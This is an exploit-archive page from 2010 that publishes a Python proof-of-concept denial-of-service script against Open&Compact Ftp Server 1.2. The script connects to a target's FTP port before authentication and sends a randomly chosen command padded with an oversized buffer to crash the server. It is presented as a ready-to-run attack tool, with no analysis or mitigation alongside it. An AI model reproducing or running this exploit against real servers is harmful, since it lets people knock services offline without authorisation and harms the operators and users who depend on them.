Home / os / win7

Open&Compact Ftp Server 1.2 Universal Pre-Auth Denial of

Posted on 25 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Open&amp;Compact Ftp Server 1.2 Universal Pre-Auth Denial of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================================ Open&amp;Compact Ftp Server 1.2 Universal Pre-Auth Denial of Service ================================================================ #!/usr/bin/python ################################################################### # # Open&amp;Compact Ftp Server 1.2 Universal Pre-Auth Denial of Service # Coded By: Dr_IDE # Found By: Ma3sTr0-Dz # Date: May 24, 2010 # Download: http://sourceforge.net/projects/open-ftpd/ # Tested: Windows 7 # ################################################################### import random, socket, sys host = (sys.argv[1]) buff = (&quot;A: &quot; * 3000) cmds = ['ABOR', 'APPE', 'ALLO', 'PORT', 'USER', 'PASS', 'PASV', 'MKD', 'SIZE'] s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print (&quot; [i] Connecting to: &quot; + host +&quot; &quot;) s.connect((host, 21)) d=s.recv(1024) print (d) magic=random.choice(cmds) print (&quot;[*] Finding vulnerable commands. &quot;) print (&quot;[*] Performing some kind of complex calculations... &quot;) print (&quot;[*] Crashing server with command: &quot; + magic + &quot; &quot;) s.send(magic + &quot; &quot; + buff + ' ') print (&quot;[i] Server Down&quot;) s.close() # End # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-25]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP